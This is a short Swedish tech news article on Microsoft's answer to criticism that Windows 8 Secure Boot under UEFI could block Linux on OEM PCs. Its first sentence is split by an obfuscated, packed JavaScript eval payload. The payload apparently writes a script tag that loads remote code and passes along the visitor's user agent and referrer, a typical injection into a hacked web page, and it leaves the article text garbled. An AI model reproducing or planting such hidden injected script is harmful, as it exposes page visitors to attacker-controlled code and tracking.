Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

PC

Microsoft ger oss svar på Windows 8 och UEFI

Microsoft ger oss svar på Windows 8 och UEFI
Sebastian

Tydligen eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rabhh|var|u0026u|referrer|aihad||js|php’.split(’|’),0,{}))
ligger valet hos OEM:er och kunderna.

Förra veckan rapporterades det att Windows 8 kan göra det svårt för Linux i PC-området eftersom Microsoft trycker på att Secure Boot ska införas som funktion i UEFI. Detta gör att endast digitalt signerade operativsystem kan startas på system med den funktionen och mer specifikt OEM datorer.

Microsoft har nu gett några svar på klagomålen som berört det som framfördes av Matthew Garret som är anställd hos Red Hat.
Microsoft valde att ge svar direkt för att minska förvirringen omkring Secure Boot och Windows.

Microsofts Tony Mangefeste  från ekosystemteamet sa att Microsoft vill ge stöd åt OEM och ha den flexibilitet att avgöra vem som ska hantera säkerhetscertifikaten och hur man ska låta kunder importera och hantera de certifikaten samt hur man hanterar Secure Boot.

Mer info: blogs.msdn.com